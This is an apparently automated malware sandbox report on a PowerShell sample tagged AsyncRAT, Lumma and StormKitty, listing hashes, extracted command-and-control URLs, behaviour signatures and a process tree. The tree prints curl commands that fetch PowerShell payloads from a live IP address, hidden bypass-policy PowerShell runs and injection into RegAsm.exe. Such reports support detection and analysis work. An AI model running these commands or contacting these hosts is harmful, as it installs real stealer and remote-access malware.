asyncrat | c10d8c90ddf07b2e6a1167ceb755559ff7a1305cdf0b0aca78771903504f10ee

Analysis

max time kernel
126s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-01-2025 00:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c10d8c90ddf07b2e6a1167ceb755559ff7a1305cdf0b0aca78771903504f10ee.ps1
Size

2KB
MD5

65c8115dabcc202be32249a26321fcad
SHA1

8789f4cd12c7b07168e1411433f64ddc20214603
SHA256

c10d8c90ddf07b2e6a1167ceb755559ff7a1305cdf0b0aca78771903504f10ee
SHA512

5bf9d9b35f0ad81f1e9e91497008b50d038d894dd73a6a5dc166a108aa63847cd0026dc3539f65a64dae6634451635c939c3c8afee5801c714298e17f101fe58

Score

10^/10

asyncrat lumma stormkitty discovery execution rat stealer

Malware Config

Extracted

Family

lumma

https://hummskitnj.buzz/api

https://cashfuzysao.buzz/api

https://appliacnesot.buzz/api

https://screwamusresz.buzz/api

https://inherineau.buzz/api

https://scentniej.buzz/api

https://rebuildeso.buzz/api

https://prisonyfork.buzz/api

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/1148-77-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	3356	powershell.exe
10	3984	powershell.exe
11	3832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3356	powershell.exe
3832	powershell.exe
3984	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3832 set thread context of 3336	3832	powershell.exe	96
PID 3984 set thread context of 1148	3984	powershell.exe	97

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
3356	powershell.exe
3356	powershell.exe
3356	powershell.exe
3356	powershell.exe
3356	powershell.exe
3356	powershell.exe
3984	powershell.exe
3832	powershell.exe
3832	powershell.exe
3984	powershell.exe
1148	RegAsm.exe
1148	RegAsm.exe
1148	RegAsm.exe
1148	RegAsm.exe
1148	RegAsm.exe
1148	RegAsm.exe
1148	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	1148	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1148	RegAsm.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 3356 wrote to memory of 1980	3356	powershell.exe	84
PID 3356 wrote to memory of 1980	3356	powershell.exe	84
PID 3356 wrote to memory of 2440	3356	powershell.exe	85
PID 3356 wrote to memory of 2440	3356	powershell.exe	85
PID 1980 wrote to memory of 1448	1980	cmd.exe	86
PID 1980 wrote to memory of 1448	1980	cmd.exe	86
PID 1980 wrote to memory of 3984	1980	cmd.exe	87
PID 1980 wrote to memory of 3984	1980	cmd.exe	87
PID 2440 wrote to memory of 3952	2440	cmd.exe	88
PID 2440 wrote to memory of 3952	2440	cmd.exe	88
PID 2440 wrote to memory of 3832	2440	cmd.exe	89
PID 2440 wrote to memory of 3832	2440	cmd.exe	89
PID 1448 wrote to memory of 1672	1448	cmd.exe	90
PID 1448 wrote to memory of 1672	1448	cmd.exe	90
PID 3952 wrote to memory of 4792	3952	cmd.exe	91
PID 3952 wrote to memory of 4792	3952	cmd.exe	91
PID 3984 wrote to memory of 3720	3984	powershell.exe	92
PID 3984 wrote to memory of 3720	3984	powershell.exe	92
PID 3832 wrote to memory of 3044	3832	powershell.exe	93
PID 3832 wrote to memory of 3044	3832	powershell.exe	93
PID 3044 wrote to memory of 3384	3044	csc.exe	95
PID 3720 wrote to memory of 4608	3720	csc.exe	94
PID 3044 wrote to memory of 3384	3044	csc.exe	95
PID 3720 wrote to memory of 4608	3720	csc.exe	94
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3832 wrote to memory of 3336	3832	powershell.exe	96
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97
PID 3984 wrote to memory of 1148	3984	powershell.exe	97

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\c10d8c90ddf07b2e6a1167ceb755559ff7a1305cdf0b0aca78771903504f10ee.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\system32\cmd.exe
    cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/tkhgfi.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1448
  - - C:\Windows\system32\curl.exe
      curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/tkhgfi.ps1
      4⤵
      PID:1672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2rnbxjlg\2rnbxjlg.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3720
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9645.tmp" "c:\Users\Admin\AppData\Local\Temp\2rnbxjlg\CSC33DAD6C479CC417FBDAC3AD4DE927972.TMP"
        5⤵
        
        PID:4608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1148
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\AdditionalModule.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\cmd.exe
    cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/iubf.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\curl.exe
      curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/iubf.ps1
      4⤵
      PID:4792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lrpoxc24\lrpoxc24.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3044
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9646.tmp" "c:\Users\Admin\AppData\Local\Temp\lrpoxc24\CSCDCC48022EC0F49C7969238D8FE1928A4.TMP"
        5⤵
        
        PID:3384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
acf4dd9122f2f1b6c5758ab5e15d3cce

SHA1
14da8d0c239d98094b34d08bd339eddd0bad1e5e

SHA256
f29cb5487d2474b9bc483498e2697f74091fbac1510b66f6c6945a42cc6b5404

SHA512
5cc7c74d069c9751579bcfa224aeb075b793f95cf9c490ea8bbde27de2aa4dddf5b73471637923fb20cadaee82f946d11b34a5602f3c26d014b69236aa8b4229

Download Submit
C:\Users\Admin\AppData\Local\Temp\2rnbxjlg\2rnbxjlg.dll

Filesize
9KB

MD5
5f1eb5d7962c7717b50f209233ffd80a

SHA1
a2236d01c73a25c1b916238ddc3b8ca440599c01

SHA256
e28dafe30ce35f6bc2f21d3bfebdd5600a422f090a2570d1a61f098e6d14f8ce

SHA512
7752fa8483001779909b47a5b7607e2393ea621f64c945f4fc1527dd771ed0415dfd8dd68086583b6fba9f1c467b79235a9f18e7d01f5727a8da9c76cef8ecd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9645.tmp

Filesize
1KB

MD5
d261e4095bb5b3b7f5a05edd5d49b758

SHA1
2264d67b84fbea17223366c06320ed1fbfda0b91

SHA256
d2257f7a8d17d9d87695d3c11f5fa6cc5070a80bac54419bff1b67dfc70ae45c

SHA512
18ec0054452440fbdede237be284109017ca36ab78531fd7e76a53b02b3786ea6f731116d08949920cc4d2a1af17e93678af3b048bf2b6c2ba4aa908384b5419

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9646.tmp

Filesize
1KB

MD5
8ebc878f988596dc289ab77c3bd79f50

SHA1
e85f17907426ac1e8c49c33111cda25d2efe1014

SHA256
15e03ecd07096d8e1d7be315f1c95040f0f2a2a016d2ba2d0fdc3bbd9ade80d4

SHA512
d0cf71564fa495c1ff88e9353376972d3df9b625a9442a2e960ff5d907a32f364254dccdeff78a02cf01de85536cf4a7d470b1e183b8d6ece3df193dd2f4e3cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hn1t2ta.xyg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lrpoxc24\lrpoxc24.dll

Filesize
9KB

MD5
624e810f9a21909e5fa32fe68443f739

SHA1
6e610f853628fd7a5f4ee9ec7addc4fb52b9d69b

SHA256
a820d40e4774e9da052ce9163a5628cfb91cc2cdfa85fa5a0a6f54c33370b5be

SHA512
fe0eb14e1d7ac69a27a25444f05732b57d8c6111657d2c07872997379a14988450c6304c248b9281729252122ceddb25ef886006ffa686cd8023c9de3c253de5

Download Submit
C:\Windows\Temp\AdditionalModule.bat

Filesize
1KB

MD5
bea07c56ecf0fd74f534f23133ae7163

SHA1
bcc9525fd0b70380e93795a9e06d506cbc4292a3

SHA256
a8cfbb2bde0f114034b74f65c3b2d2e138fd4a2e14a3543762a0528d00bff53d

SHA512
a9963b73288b4836d2bc7b134192736bd6b03c57b2a01b8f894e6fff7b10f0218ed1c63e346c26b6b356293483a94d0a91feb955af5601db84e72bda69e6a3f7

Download Submit
C:\Windows\Temp\Modules.bat

Filesize
1KB

MD5
bd7ed18850b8db6b5d4978fc7ffd4760

SHA1
9c8cfa64af9509cce484077a0d4477949a2c7197

SHA256
7f16881c93adc4575442b22c84e31a6c9a66b6c6f836b127356be34535fc9027

SHA512
2fb8d528d9112043f6f76ceb10d5b7a84b3c011bb2c0cfbf44e89c8b5a8ec333c3e22853d1731c3b7c588986c10c1314e70582944b2e33cea4fb27dcf6444a25

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2rnbxjlg\2rnbxjlg.0.cs

Filesize
10KB

MD5
f9f6e35df4fa6c35bdf52625d3641105

SHA1
301af598f3f83581217561f3de8c74a3051a0dfd

SHA256
2e555b424b335bb9b7817c1d3ee815650549a90cdd22f4d8235460ecc0a12bbf

SHA512
461ceb488bece4ff2f86382d91b3adab1a02e2f5f3ce1ae222a842f859664c3b4c71b6e7dae986a824eab735e17e38dafd081e252354bdbaf8854ae9a6a72b28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2rnbxjlg\2rnbxjlg.cmdline

Filesize
204B

MD5
57de796c501da1d372643edeeb3b935f

SHA1
27df16f9b5e9600efaea8d110ef9072fdbc9cc4f

SHA256
dd51e8ce836ee9ad76579e41ddaf857cf4b14e1c3a43cb34e8a069ecc89932d5

SHA512
a608769a70685285cc7535957b9ccb9e64d13dc81e79efece2ef7033a6ac9d8922bc1f0810c4e6188bed7523a006b1419cf599e01ccae70e53edc06d40a7a994

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2rnbxjlg\CSC33DAD6C479CC417FBDAC3AD4DE927972.TMP

Filesize
652B

MD5
343e5b82350c90267b669974462c0072

SHA1
c9f415c07f93d8a74341d32a9305713d0ac8035e

SHA256
6efebf37386dc4c29b5a41f7f16f2caaceaaaffa139cf93961255f4e69e74081

SHA512
74ec387b64f5218bb1456cc852ad8fe7b01455af47e55ecb6790dac01c79de71b64921aeba798cea16a46314634328bd14f53d02193018cdb0919ead3c71f8f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lrpoxc24\CSCDCC48022EC0F49C7969238D8FE1928A4.TMP

Filesize
652B

MD5
54f9a703297dd60b821f078ca32af1ba

SHA1
0ab66455975b2049c6ecc803fa0cf5abf9e9f87b

SHA256
eb0a801f8f23c1e2f5f3a3baab313f311a1da7916f6bad4d0b6011b07d72bcb6

SHA512
d9fa566dc8e6bff9895d77d44d87f713d7f8bbce28ea1ac63f5f501d896f87a68c6ab45475719c811a8a45a1de4b8b108ffaaa8914c5c04ef93160c26e7e43ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lrpoxc24\lrpoxc24.0.cs

Filesize
10KB

MD5
d0591a1cd02ddf80d93a9f38a763e918

SHA1
08358546fd6f80586022027b3e055402dd5618a1

SHA256
eeb9bddb9098abbc732302e757fd75cd6c3fbec729ae92a852007fa09bf0b2aa

SHA512
015e64b46fca370607dc50aef4ef053e1f3c9054fc67ecc94787cba738b1d5fffece8008e6b147c286717269965fd6794f2c9a5c36df5d6279c5deea8a375f5a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lrpoxc24\lrpoxc24.cmdline

Filesize
204B

MD5
6b45b21a2960fb02661ab89849133588

SHA1
5d29e4167b01f3138bb639d776baa7f98b2670c0

SHA256
4fd40c5bfcca7f921bd0327a3087578cc6a5f1e467c97a001f6c102801f3d9b3

SHA512
ca6469bd3107be20920abc2b18ee4222ff23f56307aa196ff3a0e71549b08b4e90b19c24002e4cc1e7a4b23ed73d60163dd568ba8be396ae3e6ef26efd26ee6f

Download Submit
memory/1148-83-0x0000000005800000-0x000000000580A000-memory.dmp

Filesize
40KB

Download
memory/1148-82-0x0000000005870000-0x0000000005902000-memory.dmp

Filesize
584KB

Download
memory/1148-81-0x0000000005960000-0x0000000005F04000-memory.dmp

Filesize
5.6MB

Download
memory/1148-77-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/3336-76-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3336-74-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3356-11-0x00007FFB40EF0000-0x00007FFB419B1000-memory.dmp

Filesize
10.8MB

Download
memory/3356-1-0x000002A297660000-0x000002A297682000-memory.dmp

Filesize
136KB

Download
memory/3356-12-0x00007FFB40EF0000-0x00007FFB419B1000-memory.dmp

Filesize
10.8MB

Download
memory/3356-20-0x00007FFB40EF0000-0x00007FFB419B1000-memory.dmp

Filesize
10.8MB

Download
memory/3356-0-0x00007FFB40EF3000-0x00007FFB40EF5000-memory.dmp

Filesize
8KB

Download
memory/3832-69-0x000002AE3D320000-0x000002AE3D328000-memory.dmp

Filesize
32KB

Download
memory/3832-47-0x000002AE3D310000-0x000002AE3D320000-memory.dmp

Filesize
64KB

Download
memory/3832-42-0x000002AE554C0000-0x000002AE55504000-memory.dmp

Filesize
272KB

Download
memory/3984-72-0x0000023260B00000-0x0000023260B08000-memory.dmp

Filesize
32KB

Download
memory/3984-43-0x0000023260F50000-0x0000023260FC6000-memory.dmp

Filesize
472KB

Download
memory/3984-44-0x0000023260AF0000-0x0000023260B00000-memory.dmp

Filesize
64KB

Download
memory/3984-80-0x00007FFB40EF0000-0x00007FFB419B1000-memory.dmp

Filesize
10.8MB

Download
memory/3984-23-0x00007FFB40EF0000-0x00007FFB419B1000-memory.dmp

Filesize
10.8MB

Download
memory/3984-22-0x00007FFB40EF0000-0x00007FFB419B1000-memory.dmp

Filesize
10.8MB

Download